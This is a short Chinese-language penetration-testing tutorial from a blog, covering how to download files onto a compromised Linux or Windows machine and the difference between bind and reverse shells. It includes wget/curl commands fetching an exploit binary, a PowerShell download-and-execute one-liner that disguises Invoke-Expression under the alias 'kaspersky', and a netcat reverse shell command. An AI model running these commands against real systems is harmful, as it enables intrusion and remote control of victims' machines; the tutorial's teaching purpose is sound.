基础篇(二):操作系统
文件下载
Linux
使用wget、curl等命令,如:
wget http://127.0.0.1:8080/ms10-051.exe -O exploit.exe
curl http://127.0.0.1:8080/ms10-051.exe -o exploit.exe
Windows
使用powershell,如:
powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString(‘http://127.0.0.1:8080/payload.ps1')
正向连接
假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器,这是比较常规的形式,我们叫做正向连接。
远程桌面、web服务、ssh、telnet等等都是正向连接。
反向连接(反弹Shell)
受害者主机主动连接攻击者的服务端程序,即为反向连接,也叫反弹Shell。
反弹Shell生成器Q:为什么要用反弹shell呢?
1.目标机因防火墙受限,目标机器只能发送请求,不能接收请求。
2.目标机端口被占用,由于防火墙策略可能合法的ssh连接等都会被阻断。
3.目标机位于局域网,或IP会动态变化,攻击机无法直接连接。
例:通过nc反弹Shell
攻击机:开启监听nc -lvnp 8888
靶机:主动连接nc 攻击机ip 8888 -e /bin/bash
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 go0d1uck's Blog!